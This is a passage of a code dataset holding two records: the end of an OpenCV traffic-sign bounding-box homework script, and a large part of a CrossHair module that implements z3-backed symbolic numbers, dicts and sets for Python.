np.array([30, 255, 255], dtype = np.uint8)\n\n red_lower1 = np.array([0,70,50], dtype=np.uint8)\n red_upper1 = np.array([10, 255, 255], dtype=np.uint8)\n red_lower2 = np.array([170,70,50], dtype=np.uint8)\n red_upper2 = np.array([180, 255, 200], dtype=np.uint8)\n\n blue_lower = np.array([70,40,0],np.uint8) #100, 150\n blue_upper = np.array([140,255,255],np.uint8)\n\n blueBB = predictBlueTSBoundingBox(img, blue_lower, blue_upper, cannyLowerThres, cannyUpperThres)\n redBB = predictRedTSBoundingBox(img, blueBB, red_lower1, red_upper1, red_lower2, red_upper2, cannyLowerThres, cannyUpperThres)\n yellowBB = predictYellowTSBoundingBox(img, blueBB, redBB, yellow_lower, yellow_upper, cannyLowerThres, cannyUpperThres)#\n redLargeBB = predictLargeRedBoundingBox(img, red_lower1, red_upper1, red_lower2, red_upper2, cannyLowerThres, cannyUpperThres)#\n largeBB = predictLargeBoundingBox(img, blueBB, redBB, yellowBB, brown_lower, brown_upper, blue_lower, blue_upper, cannyLowerThres, cannyUpperThres)\n\n return yellowBB, redLargeBB, largeBB\n\ndef test():\n rgbImagePath1 \t= glob.glob('../CVS_HW_FILES/g1/rgb/*.jpg')\t\t# 20 db\n rgbImagePath2 \t= glob.glob('../CVS_HW_FILES/g2/rgb/*.jpg')\t\t# 16 db\n rgbImagePath3 \t= glob.glob('../CVS_HW_FILES/g3/rgb/*.jpg')\t\t# 19 db\n rgbImagePath4 \t= glob.glob('../CVS_HW_FILES/g4/rgb/*.jpg')\t\t# 15 db\n\n trainPath \t\t= rgbImagePath1 + rgbImagePath2 + rgbImagePath3\t# 55 db || eltérő fényviszonyos képek indexei: 18, 34, 53\n valPath\t\t\t= rgbImagePath4\t\t\t\t\t\t\t\t\t# 15 db || eltérő fényviszonyos képek indexei: 12\n\n for i in range(len(trainPath)):\n image = cv2.imread(trainPath[i])\n yellowBB, redLargeBB, largeBB = predict_bboxes(image)\n for box in yellowBB:\n x1, y1, x2, y2 = box[0], box[1], box[2], box[3] \n cv2.rectangle(image, (x1,y1), (x2,y2), (0,0,255), 2)\n \n cv2.imwrite('../FinalTest/{}.jpg'.format(i), image)\n\n\n\n","sub_path":"task1_bbox_prediction.py","file_name":"task1_bbox_prediction.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"183623506","text":"import collections\nimport contextlib\nimport copy\nimport enum\nimport functools\nimport io\nimport operator\nimport re\nimport typing\nfrom typing import *\nimport builtins as orig_builtins\n\nfrom crosshair.abcstring import AbcString\nfrom crosshair.core import register_patch\nfrom crosshair.core import register_type\nfrom crosshair.core import realize\nfrom crosshair.core import proxy_for_type\nfrom crosshair.core import python_type\nfrom crosshair.core import normalize_pytype\nfrom crosshair.core import choose_type\nfrom crosshair.core import CrossHairValue\nfrom crosshair.core import SmtProxyMarker\nfrom crosshair.core import type_arg_of\nfrom crosshair.core import type_args_of\nfrom crosshair.core import name_of_type\nfrom crosshair.core import with_realized_args\nfrom crosshair.objectproxy import ObjectProxy\nfrom crosshair.simplestructs import SimpleDict\nfrom crosshair.simplestructs import SequenceConcatenation\nfrom crosshair.simplestructs import SliceView\nfrom crosshair.simplestructs import ShellMutableSequence\nfrom crosshair.statespace import StateSpace\nfrom crosshair.statespace import HeapRef\nfrom crosshair.statespace import SnapshotRef\nfrom crosshair.statespace import model_value_to_python\nfrom crosshair.type_repo import PYTYPE_SORT\nfrom crosshair.util import debug\nfrom crosshair.util import CrosshairInternal\nfrom crosshair.util import CrosshairUnsupported\nfrom crosshair.util import IgnoreAttempt\nfrom crosshair.util import is_iterable\nfrom crosshair.util import is_hashable\n\nimport z3 # type: ignore\n\nclass _Missing(enum.Enum):\n value = 0\n\n_MISSING = _Missing.value\n\n\ndef smt_min(x, y):\n if x is y:\n return x\n return z3.If(x <= y, x, y)\n\ndef smt_sort_has_heapref(sort: z3.SortRef) -> bool:\n return 'HeapRef' in str(sort) # TODO: don't do this :)\n\n_HEAPABLE_PYTYPES = set([int, float, str, bool, type(None), complex])\n\ndef pytype_uses_heap(typ: Type) -> bool:\n return not (typ in _HEAPABLE_PYTYPES)\n\ndef typeable_value(val: object) -> object:\n '''\n Foces values of unknown type (SmtObject) into a typed (but possibly still symbolic) value.\n '''\n while type(val) is SmtObject:\n val = cast(SmtObject, val)._wrapped()\n return val\n\n_SMT_FLOAT_SORT = z3.RealSort() # difficulty getting the solver to use z3.Float64()\n\n_TYPE_TO_SMT_SORT = {\n bool: z3.BoolSort(),\n str: z3.StringSort(),\n int: z3.IntSort(),\n float: _SMT_FLOAT_SORT,\n}\n\n\ndef possibly_missing_sort(sort):\n datatype = z3.Datatype('optional_' + str(sort) + '_')\n datatype.declare('missing')\n datatype.declare('present', ('valueat', sort))\n ret = datatype.create()\n return ret\n\n\ndef type_to_smt_sort(t: Type) -> z3.SortRef:\n t = normalize_pytype(t)\n if t in _TYPE_TO_SMT_SORT:\n return _TYPE_TO_SMT_SORT[t]\n origin = origin_of(t)\n if origin is type:\n return PYTYPE_SORT\n return HeapRef\n\nSmtGenerator = Callable[[StateSpace, type, Union[str, z3.ExprRef]], object]\n\n_PYTYPE_TO_WRAPPER_TYPE: Dict[type, SmtGenerator] = {} # to be populated later\n_WRAPPER_TYPE_TO_PYTYPE: Dict[SmtGenerator, type] = {}\n\ndef origin_of(typ: Type) -> Type:\n typ = _WRAPPER_TYPE_TO_PYTYPE.get(typ, typ)\n if hasattr(typ, '__origin__'):\n return typ.__origin__\n return typ\n\ndef crosshair_type_for_python_type(typ: Type) -> Optional[SmtGenerator]:\n typ = normalize_pytype(typ)\n origin = origin_of(typ)\n return _PYTYPE_TO_WRAPPER_TYPE.get(origin)\n\n\ndef smt_bool_to_int(a: z3.ExprRef) -> z3.ExprRef:\n return z3.If(a, 1, 0)\n\n\ndef smt_int_to_float(a: z3.ExprRef) -> z3.ExprRef:\n if _SMT_FLOAT_SORT == z3.Float64():\n return z3.fpRealToFP(z3.RNE(), z3.ToReal(a), _SMT_FLOAT_SORT)\n elif _SMT_FLOAT_SORT == z3.RealSort():\n return z3.ToReal(a)\n else:\n raise CrosshairInternal()\n\n\ndef smt_bool_to_float(a: z3.ExprRef) -> z3.ExprRef:\n if _SMT_FLOAT_SORT == z3.Float64():\n return z3.If(a, z3.FPVal(1.0, _SMT_FLOAT_SORT), z3.FPVal(0.0, _SMT_FLOAT_SORT))\n elif _SMT_FLOAT_SORT == z3.RealSort():\n return z3.If(a, z3.RealVal(1), z3.RealVal(0))\n else:\n raise CrosshairInternal()\n\n_IMPLICIT_SORT_CONVERSIONS: Dict[Tuple[z3.SortRef, z3.SortRef], Callable[[z3.ExprRef], z3.ExprRef]] = {\n (z3.BoolSort(), z3.IntSort()): smt_bool_to_int,\n (z3.BoolSort(), _SMT_FLOAT_SORT): smt_bool_to_float,\n (z3.IntSort(), _SMT_FLOAT_SORT): smt_int_to_float,\n}\n\n_LITERAL_PROMOTION_FNS = {\n bool: z3.BoolVal,\n int: z3.IntVal,\n float: z3.RealVal if _SMT_FLOAT_SORT == z3.RealSort() else (lambda v: z3.FPVal(v, _SMT_FLOAT_SORT)),\n str: z3.StringVal,\n}\n\ndef smt_coerce(val: Any) -> z3.ExprRef:\n if isinstance(val, SmtBackedValue):\n return val.var\n return val\n\ndef force_to_smt_sort(space: StateSpace, input_value: Any, desired_sort: z3.SortRef) -> z3.ExprRef:\n ret = coerce_to_smt_sort(space, input_value, desired_sort)\n if ret is None:\n raise TypeError('Could not derive smt sort ' + str(desired_sort))\n return ret\n\ndef coerce_to_smt_sort(space: StateSpace, input_value: Any, desired_sort: z3.SortRef) -> Optional[z3.ExprRef]:\n natural_value = None\n input_value = typeable_value(input_value)\n promotion_fn = _LITERAL_PROMOTION_FNS.get(type(input_value))\n if isinstance(input_value, SmtBackedValue):\n natural_value = input_value.var\n if type(natural_value) is tuple:\n # Many container types aren't described by a single z3 value:\n return None\n elif promotion_fn:\n natural_value = promotion_fn(input_value)\n elif isinstance(input_value, z3.ExprRef):\n natural_value = input_value\n natural_sort = natural_value.sort() if natural_value is not None else None\n conversion_fn = _IMPLICIT_SORT_CONVERSIONS.get((natural_sort, desired_sort))\n if conversion_fn:\n return conversion_fn(natural_value)\n if natural_sort == desired_sort:\n return natural_value\n if desired_sort == HeapRef:\n return space.find_val_in_heap(input_value)\n if desired_sort == PYTYPE_SORT and isinstance(input_value, type):\n return space.type_repo.get_type(input_value)\n return None\n\n\ndef coerce_to_smt_var(space: StateSpace, v: Any) -> z3.ExprRef:\n v = typeable_value(v)\n if isinstance(v, SmtBackedValue):\n return v.var\n promotion_fn = _LITERAL_PROMOTION_FNS.get(type(v))\n if promotion_fn:\n return promotion_fn(v)\n return space.find_val_in_heap(v)\n\n\ndef smt_to_ch_value(space: StateSpace, snapshot: SnapshotRef, smt_val: z3.ExprRef, pytype: type) -> object:\n def proxy_generator(typ: Type) -> object:\n return proxy_for_type(typ, space, 'heapval' + str(typ) + space.uniq())\n if smt_val.sort() == HeapRef:\n return space.find_key_in_heap(smt_val, pytype, proxy_generator, snapshot)\n ch_type = crosshair_type_for_python_type(pytype)\n assert ch_type is not None\n return ch_type(space, pytype, smt_val)\n\n\ndef attr_on_ch_value(other: Any, statespace: StateSpace, attr: str) -> object:\n if not isinstance(other, CrossHairValue):\n smt_var = coerce_to_smt_var(statespace, other)\n py_type = python_type(other)\n Typ = crosshair_type_for_python_type(py_type)\n if Typ is None:\n raise TypeError\n other = Typ(statespace, py_type, smt_var)\n if not hasattr(other, attr):\n raise TypeError\n return getattr(other, attr)\n\nclass SmtBackedValue(CrossHairValue):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.statespace = statespace\n self.snapshot = SnapshotRef(-1)\n self.python_type = typ\n if isinstance(smtvar, str):\n self.var = self.__init_var__(typ, smtvar)\n else:\n self.var = smtvar\n # TODO test that smtvar's sort matches expected?\n\n def __init_var__(self, typ, varname):\n z3type = type_to_smt_sort(typ)\n return z3.Const(varname, z3type)\n\n def __deepcopy__(self, memo):\n shallow = copy.copy(self)\n shallow.snapshot = self.statespace.current_snapshot()\n return shallow\n\n def __bool__(self):\n return NotImplemented\n\n def __eq__(self, other):\n coerced = coerce_to_smt_sort(self.statespace, other, self.var.sort())\n if coerced is None:\n return False\n return SmtBool(self.statespace, bool, self.var == coerced)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __req__(self, other):\n return self.__eq__(other)\n\n def __rne__(self, other):\n return attr_on_ch_value(other, self.statespace, '__ne__')(self)\n\n def __lt__(self, other):\n raise TypeError\n\n def __gt__(self, other):\n raise TypeError\n\n def __le__(self, other):\n raise TypeError\n\n def __ge__(self, other):\n raise TypeError\n\n def __add__(self, other):\n raise TypeError\n\n def __sub__(self, other):\n raise TypeError\n\n def __mul__(self, other):\n raise TypeError\n\n def __pow__(self, other):\n raise TypeError\n\n def __truediv__(self, other):\n raise TypeError\n\n def __floordiv__(self, other):\n raise TypeError\n\n def __mod__(self, other):\n raise TypeError\n\n def __and__(self, other):\n raise TypeError\n\n def __or__(self, other):\n raise TypeError\n\n def __xor__(self, other):\n raise TypeError\n\n def __ch_pytype__(self):\n return self.python_type\n\n def __ch_realize__(self):\n return origin_of(self.python_type)(self)\n\n def __ch_forget_contents__(self, space: StateSpace):\n clean_smt = type(self)(space, self.python_type,\n str(self.var) + space.uniq())\n self.var = clean_smt.var\n\n def _binary_op(self, other, smt_op, py_op=None, expected_sort=None):\n #debug(f'binary op ({smt_op}) on value of type {type(other)}')\n left = self.var\n if expected_sort is None:\n expected_sort = type_to_smt_sort(self.python_type)\n right = coerce_to_smt_sort(self.statespace, other, expected_sort)\n if right is None:\n return py_op(realize(self), realize(other))\n try:\n ret = smt_op(left, right)\n except z3.z3types.Z3Exception as e:\n debug('Raising z3 error as Python TypeError: ', str(e))\n raise TypeError\n return self.__class__(self.statespace, self.python_type, ret)\n\n def _unary_op(self, op):\n return self.__class__(self.statespace, self.python_type, op(self.var))\n\n\nclass SmtNumberAble(SmtBackedValue):\n def _numeric_binary_smt_op(self, other, op) -> Optional[Tuple[z3.ExprRef, type]]:\n other = typeable_value(other)\n if type(other) is SmtBool:\n # at a minimum, promote to an integer (in case both values are booleans)\n other = convert(other, int)\n l_val, r_val = convert_to_common_type(self, typeable_value(other))\n l_pytype = python_type(l_val)\n r_pytype = python_type(r_val)\n if l_pytype != r_pytype:\n return None\n l_var = coerce_to_smt_var(self.statespace, l_val)\n r_var = coerce_to_smt_var(self.statespace, r_val)\n return (op(l_var, r_var), l_pytype)\n\n def _numeric_binary_op(self, other, op, op_result_pytype=None):\n if type(other) == complex:\n return op(complex(self), complex(other))\n result = self._numeric_binary_smt_op(other, op)\n if result is None:\n raise TypeError\n smt_result, common_pytype = result\n if op_result_pytype is not None:\n common_pytype = op_result_pytype\n cls = _PYTYPE_TO_WRAPPER_TYPE[common_pytype]\n return cls(self.statespace, common_pytype, smt_result)\n\n def __pos__(self):\n return self\n\n def __neg__(self):\n return self._unary_op(operator.neg)\n\n def __abs__(self):\n return self._unary_op(lambda v: z3.If(v < 0, -v, v))\n\n def __lt__(self, other):\n return self._numeric_binary_op(other, operator.lt, op_result_pytype=bool)\n\n def __gt__(self, other):\n return self._numeric_binary_op(other, operator.gt, op_result_pytype=bool)\n\n def __le__(self, other):\n return self._numeric_binary_op(other, operator.le, op_result_pytype=bool)\n\n def __ge__(self, other):\n return self._numeric_binary_op(other, operator.ge, op_result_pytype=bool)\n\n def __eq__(self, other):\n # Note this is a little different than the other comparison operations, because\n # equality doesn't raise TypeErrors on mismatched types\n result = self._numeric_binary_smt_op(other, operator.eq)\n if result is None:\n return False\n return SmtBool(self.statespace, bool, result[0])\n\n def __add__(self, other):\n return self._numeric_binary_op(other, operator.add)\n\n def __sub__(self, other):\n return self._numeric_binary_op(other, operator.sub)\n\n def __mul__(self, other):\n if isinstance(other, (str, SmtStr, collections.abc.Sequence)):\n return other.__mul__(self)\n return self._numeric_binary_op(other, operator.mul)\n\n def __pow__(self, other):\n if other < 0 and self == 0:\n raise ZeroDivisionError\n return self._numeric_binary_op(other, operator.pow)\n\n def __rmul__(self, other):\n return attr_on_ch_value(other, self.statespace, '__mul__')(self)\n\n def __radd__(self, other):\n return attr_on_ch_value(other, self.statespace, '__add__')(self)\n\n def __rsub__(self, other):\n return attr_on_ch_value(other, self.statespace, '__sub__')(self)\n\n def __rtruediv__(self, other):\n return attr_on_ch_value(other, self.statespace, '__truediv__')(self)\n\n def __rfloordiv__(self, other):\n return attr_on_ch_value(other, self.statespace, '__floordiv__')(self)\n\n def __rmod__(self, other):\n return attr_on_ch_value(other, self.statespace, '__mod__')(self)\n\n def __rdivmod__(self, other):\n return attr_on_ch_value(other, self.statespace, '__divmod__')(self)\n\n def __rpow__(self, other):\n return attr_on_ch_value(other, self.statespace, '__pow__')(self)\n\n def __rlshift__(self, other):\n return attr_on_ch_value(other, self.statespace, '__lshift__')(self)\n\n def __rrshift__(self, other):\n return attr_on_ch_value(other, self.statespace, '__rshift__')(self)\n\n def __rand__(self, other):\n return attr_on_ch_value(other, self.statespace, '__and__')(self)\n\n def __rxor__(self, other):\n return attr_on_ch_value(other, self.statespace, '__xor__')(self)\n\n def __ror__(self, other):\n return attr_on_ch_value(other, self.statespace, '__or__')(self)\n\nclass SmtIntable(SmtNumberAble):\n # bitwise operators\n def __invert__(self):\n return -(self + 1)\n\n def __lshift__(self, other):\n if other < 0:\n raise ValueError('negative shift count')\n return self * (2 ** other)\n\n def __rshift__(self, other):\n if other < 0:\n raise ValueError('negative shift count')\n return self // (2 ** other)\n\n def _apply_bitwise(self, op: Callable, v1: int, v2: int) -> int:\n if (not hasattr(v1, '__index__')) or (not hasattr(v2, '__index__')):\n raise TypeError\n return op(v1.__index__(), v2.__index__())\n\n def __and__(self, other):\n return self._apply_bitwise(operator.and_, self, other)\n\n def __or__(self, other):\n return self._apply_bitwise(operator.or_, self, other)\n\n def __xor__(self, other):\n return self._apply_bitwise(operator.xor, self, other)\n\n def __truediv__(self, other):\n return self.__float__() / other\n\n def __divmod__(self, other):\n return (self // other, self % other)\n\n def __floordiv__(self, other):\n if other == 0:\n raise ZeroDivisionError()\n if not isinstance(other, (bool, int, SmtInt, SmtBool)):\n return realize(self) // realize(other)\n return self._numeric_binary_op(other, lambda x, y: z3.If(\n x % y == 0 or x >= 0, x / y, z3.If(y >= 0, x / y + 1, x / y - 1)))\n\n def __mod__(self, other):\n if other == 0:\n raise ZeroDivisionError()\n if not isinstance(other, (bool, int, SmtInt, SmtBool)):\n return realize(self) % realize(other)\n return self._numeric_binary_op(other, operator.mod)\n\n\nclass SmtBool(SmtIntable):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == bool\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __neg__(self):\n return SmtInt(self.statespace, int, -smt_bool_to_int(self.var))\n\n def __repr__(self):\n return self.__bool__().__repr__()\n\n def __hash__(self):\n return self.__bool__().__hash__()\n\n def __index__(self):\n return SmtInt(self.statespace, int, smt_bool_to_int(self.var))\n\n def __xor__(self, other):\n return self._binary_op(other, z3.Xor)\n\n def __bool__(self):\n return self.statespace.choose_possible(self.var)\n\n def __int__(self):\n return SmtInt(self.statespace, int, smt_bool_to_int(self.var))\n\n def __float__(self):\n return SmtFloat(self.statespace, float, smt_bool_to_float(self.var))\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __add__(self, other):\n return self._numeric_binary_op(other, operator.add)\n\n def __sub__(self, other):\n return self._numeric_binary_op(other, operator.sub)\n\n\nclass SmtInt(SmtIntable):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: Union[str, z3.ArithRef]):\n assert typ == int\n assert type(smtvar) != int\n SmtIntable.__init__(self, statespace, typ, smtvar)\n\n def __repr__(self):\n return self.__index__().__repr__()\n\n def __hash__(self):\n return self.__index__().__hash__()\n\n def __float__(self):\n return SmtFloat(self.statespace, float, smt_int_to_float(self.var))\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __index__(self):\n #debug('WARNING: attempting to materialize symbolic integer. Trace:')\n # traceback.print_stack()\n if self == 0:\n return 0\n ret = self.statespace.find_model_value(self.var)\n assert type(ret) is int\n return ret\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self.var != 0).__bool__()\n\n def __int__(self):\n return self.__index__()\n\n\n_Z3_ONE_HALF = z3.RealVal(\"1/2\")\n\n\nclass SmtFloat(SmtNumberAble):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n assert typ == float\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n\n def __repr__(self):\n return self.statespace.find_model_value(self.var).__repr__()\n\n def __hash__(self):\n return self.statespace.find_model_value(self.var).__hash__()\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self.var != 0).__bool__()\n \n def __float__(self):\n return self.statespace.find_model_value(self.var).__float__()\n\n def __complex__(self):\n return complex(self.__float__())\n\n def __round__(self, ndigits=None):\n if ndigits is not None:\n factor = 10 ** ndigits\n return round(self * factor) / factor\n else:\n var, floor, nearest = self.var, z3.ToInt(\n self.var), z3.ToInt(self.var + _Z3_ONE_HALF)\n return SmtInt(self.statespace, int, z3.If(var != floor + _Z3_ONE_HALF, nearest, z3.If(floor % 2 == 0, floor, floor + 1)))\n\n def __floor__(self):\n return SmtInt(self.statespace, int, z3.ToInt(self.var))\n\n def __ceil__(self):\n var, floor = self.var, z3.ToInt(self.var)\n return SmtInt(self.statespace, int, z3.If(var == floor, floor, floor + 1))\n\n def __mod__(self, other):\n return realize(self) % realize(other) # TODO: z3 does not support modulo on reals\n\n def __trunc__(self):\n var, floor = self.var, z3.ToInt(self.var)\n return SmtInt(self.statespace, int, z3.If(var >= 0, floor, floor + 1))\n\n def __truediv__(self, other):\n if other == 0:\n raise ZeroDivisionError('division by zero')\n return self._numeric_binary_op(other, operator.truediv)\n\n\n_CONVERSION_METHODS: Dict[Tuple[type, type], Any] = {\n (bool, int): int,\n (bool, float): float,\n (bool, complex): complex,\n (SmtBool, int): lambda i: SmtInt(i.statespace, int, smt_bool_to_int(i.var)),\n (SmtBool, float): lambda i: SmtFloat(i.statespace, float, smt_bool_to_float(i.var)),\n (SmtBool, complex): complex,\n \n (int, float): float,\n (int, complex): complex,\n (SmtInt, float): lambda i: SmtFloat(i.statespace, float, smt_int_to_float(i.var)),\n (SmtInt, complex): complex,\n \n (float, complex): complex,\n (SmtFloat, complex): complex,\n}\n\ndef convert(val: object, target_type: type) -> object:\n '''\n Attempt to convert to the given type, as Python would perform\n implicit conversion. Handles both crosshair and native values.\n '''\n orig_type = type(val)\n converter = _CONVERSION_METHODS.get((orig_type, target_type))\n if converter:\n return converter(val)\n return val\n\ndef convert_to_common_type(val1: object, val2: object) -> Tuple[object, object]:\n return (convert(val1, python_type(val2)),\n convert(val2, python_type(val1)))\n\nclass SmtDictOrSet(SmtBackedValue):\n '''\n TODO: Ordering is a challenging issue here.\n Modern pythons have in-order iteration for dictionaries but not sets.\n '''\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.key_pytype = normalize_pytype(type_arg_of(typ, 0))\n self.smt_key_sort = type_to_smt_sort(self.key_pytype)\n SmtBackedValue.__init__(self, statespace, typ, smtvar)\n self.key_ch_type = crosshair_type_for_python_type(self.key_pytype)\n self.statespace.add(self._len() >= 0)\n\n def _arr(self):\n return self.var[0]\n\n def _len(self):\n return self.var[1]\n\n def __len__(self):\n return SmtInt(self.statespace, int, self._len())\n\n def __bool__(self):\n return SmtBool(self.statespace, bool, self._len() != 0).__bool__()\n\n\nclass SmtDict(SmtDictOrSet, collections.abc.MutableMapping):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n self.val_pytype = normalize_pytype(type_arg_of(typ, 1))\n self.smt_val_sort = type_to_smt_sort(self.val_pytype)\n SmtDictOrSet.__init__(self, statespace, typ, smtvar)\n self.val_ch_type = crosshair_type_for_python_type(self.val_pytype)\n arr_var = self._arr()\n len_var = self._len()\n self.val_missing_checker = arr_var.sort().range().recognizer(0)\n self.val_missing_constructor = arr_var.sort().range().constructor(0)\n self.val_constructor = arr_var.sort().range().constructor(1)\n self.val_accessor = arr_var.sort().range().accessor(1, 0)\n self.empty = z3.K(arr_var.sort().domain(),\n self.val_missing_constructor())\n self.statespace.add((arr_var == self.empty) == (len_var == 0))\n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n arr_smt_sort = z3.ArraySort(\n self.smt_key_sort, possibly_missing_sort(self.smt_val_sort))\n return (\n z3.Const(varname + '_map' + self.statespace.uniq(), arr_smt_sort),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def __eq__(self, other):\n (self_arr, self_len) = self.var\n has_heapref = smt_sort_has_heapref(\n self.var[1].sort()) or smt_sort_has_heapref(self.var[0].sort())\n if not has_heapref:\n if isinstance(other, SmtDict):\n (other_arr, other_len) = other.var\n return SmtBool(self.statespace, bool, z3.And(self_len == other_len, self_arr == other_arr))\n # Manually check equality. Drive the loop from the (likely) concrete value 'other':\n if not isinstance(other, collections.abc.Mapping):\n return False\n if len(self) != len(other):\n return False\n for k, v in other.items():\n if k not in self or self[k] != v:\n return False\n return True\n\n def __repr__(self):\n return str(dict(self.items()))\n\n def __setitem__(self, k, v):\n missing = self.val_missing_constructor()\n k = coerce_to_smt_sort(self.statespace, k, self.smt_key_sort)\n v = coerce_to_smt_sort(self.statespace, v, self.smt_val_sort)\n if k is None or v is None:\n # TODO: dictionaries can become more losely typed as items are\n # assigned. Dictionary is invariant, though, so perhaps such cases\n # should have been already caught by the type checker.\n raise CrosshairUnsupported('dictionary assignment with conflicting types')\n old_arr, old_len = self.var\n new_len = z3.If(z3.Select(old_arr, k) == missing, old_len + 1, old_len)\n self.var = (z3.Store(old_arr, k, self.val_constructor(v)), new_len)\n\n def __delitem__(self, k):\n missing = self.val_missing_constructor()\n k = force_to_smt_sort(self.statespace, k, self.smt_key_sort)\n old_arr, old_len = self.var\n if SmtBool(self.statespace, bool, z3.Select(old_arr, k) == missing).__bool__():\n raise KeyError(k)\n if SmtBool(self.statespace, bool, self._len() == 0).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n self.var = (z3.Store(old_arr, k, missing), old_len - 1)\n\n def __getitem__(self, k):\n with self.statespace.framework():\n smt_key = coerce_to_smt_sort(self.statespace, k, self.smt_key_sort)\n if smt_key is None:\n # A key of the wrong type cannot be present.\n # Try to raise the right exception:\n if getattr(k, '__hash__', None) is None:\n raise TypeError(\"unhashable type\")\n else:\n raise KeyError(k)\n possibly_missing = self._arr()[smt_key]\n is_missing = self.val_missing_checker(possibly_missing)\n if SmtBool(self.statespace, bool, is_missing).__bool__():\n raise KeyError(k)\n if SmtBool(self.statespace, bool, self._len() == 0).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n return smt_to_ch_value(self.statespace,\n self.snapshot,\n self.val_accessor(possibly_missing),\n self.val_pytype)\n\n def __iter__(self):\n # TODO: dictionaries now have constant ordering.\n # TODO: partial iteration can produce impossible results.\n arr_var, len_var = self.var\n idx = 0\n arr_sort = self._arr().sort()\n missing = self.val_missing_constructor()\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n if SmtBool(self.statespace, bool, arr_var == self.empty).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n k = z3.Const('k' + str(idx) + self.statespace.uniq(),\n arr_sort.domain())\n v = z3.Const('v' + str(idx) + self.statespace.uniq(),\n self.val_constructor.domain(0))\n remaining = z3.Const('remaining' + str(idx) +\n self.statespace.uniq(), arr_sort)\n idx += 1\n self.statespace.add(arr_var == z3.Store(\n remaining, k, self.val_constructor(v)))\n self.statespace.add(z3.Select(remaining, k) == missing)\n yield smt_to_ch_value(self.statespace,\n self.snapshot,\n k,\n self.key_pytype)\n arr_var = remaining\n # In this conditional, we reconcile the parallel symbolic variables for length\n # and contents:\n if SmtBool(self.statespace, bool, arr_var != self.empty).__bool__():\n raise IgnoreAttempt('SmtDict in inconsistent state')\n\n def copy(self):\n return SmtDict(self.statespace, self.python_type, self.var)\n\n # TODO: investigate this approach for type masquerading:\n # @property\n # def __class__(self):\n # return dict\n\n\nclass SmtSet(SmtDictOrSet, collections.abc.Set):\n def __init__(self, statespace: StateSpace, typ: Type, smtvar: object):\n SmtDictOrSet.__init__(self, statespace, typ, smtvar)\n self.empty = z3.K(self._arr().sort().domain(), False)\n self.statespace.add((self._arr() == self.empty) == (self._len() == 0))\n\n def __eq__(self, other):\n (self_arr, self_len) = self.var\n if isinstance(other, SmtSet):\n (other_arr, other_len) = other.var\n if other_arr.sort() == self_arr.sort():\n return SmtBool(self.statespace, bool, z3.And(self_len == other_len, self_arr == other_arr))\n if not isinstance(other, (set, frozenset, SmtSet)):\n return False\n # Manually check equality. Drive size from the (likely) concrete value 'other':\n if len(self) != len(other):\n return False\n # Then iterate on self (iteration will create a lot of good symbolic constraints):\n for item in self:\n # We iterate over other instead of just checking \"if item in other:\" because we\n # don't want to hash our symbolic item, which would materialize it.\n found = False\n for oitem in other:\n if item == oitem:\n found = True\n break\n if not found:\n return False\n return True\n\n def __init_var__(self, typ, varname):\n assert typ == self.python_type\n return (\n z3.Const(varname + '_map' + self.statespace.uniq(),\n z3.ArraySort(type_to_smt_sort(self.key_pytype),\n z3.BoolSort())),\n z3.Const(varname + '_len' + self.statespace.uniq(), z3.IntSort())\n )\n\n def __contains__(self, raw_key):\n converted_key = convert(raw_key, self.key_pytype) # handle implicit numeric conversions\n k = coerce_to_smt_sort(self.statespace, converted_key, self._arr().sort().domain())\n if k is not None:\n present = self._arr()[k]\n return SmtBool(self.statespace, bool, present)\n # Fall back to standard equality and iteration\n for self_item in self:\n if self_item == raw_key:\n return True\n return False\n\n def __iter__(self):\n arr_var, len_var = self.var\n idx = 0\n arr_sort = self._arr().sort()\n keys_on_heap = smt_sort_has_heapref(arr_sort.domain())\n already_yielded = []\n while SmtBool(self.statespace, bool, idx < len_var).__bool__():\n if SmtBool(self.statespace, bool, arr_var == self.empty).__bool__():\n raise IgnoreAttempt('SmtSet in inconsistent state')\n k = z3.Const('k' + str(idx) + self.statespace.uniq(),\n arr_sort.domain())\n remaining = z3.Const('remaining' + str(idx) +\n self.statespace.uniq(), arr_sort)\n idx += 1\n self.statespace.add(arr_var == z3.Store(remaining, k, True))\n self.statespace.add(z3.Not(z3.Select(remaining, k)))\n ch_value = smt_to_ch_value(self.statespace, self.snapshot, k, self.key_pytype)\n if keys_on_heap:\n # need to confirm that we do not yield two keys that are __eq__\n for previous_value in already_yielded:\n if ch_value == previous_value:\n raise IgnoreAttempt('Duplicate items in set')\n already_yielded.append(ch_value)\n yield ch_value\n arr_var = remaining\n # In this conditional, we reconcile the parallel symbolic variables for length\n # and contents:\n if SmtBool(self.statespace, bool, arr_var != self.empty).__bool__():\n raise IgnoreAttempt('SmtSet in inconsistent state')\n debug('Set size determined to be ', idx)\n\n def _set_op(self, attr, other):\n # We need to check the type of other here, because builtin sets\n # do not accept iterable args (but the abc Set does)\n if isinstance(other, collections.abc.Set):\n return getattr(collections.abc.Set, attr)(self, other)\n else:\n raise TypeError\n\n # Hardwire some operations into abc methods\n # (SmtBackedValue defaults these operations into\n # TypeErrors, but must appear first in the mro)\n def __ge__(self, other):\n return self._set_op('__ge__', other)\n\n def __gt__(self, other):\n return self._set_op('__gt__', other)\n\n def __le__(self, other):\n return self._set_op('__le__', other)\n\n def __lt__(self, other):\n return self._set_op('__lt__', other)\n\n def __and__(self, other):\n return self._set_op('__and__', other)\n __rand__ = __and__\n\n def __or__(self, other):\n return 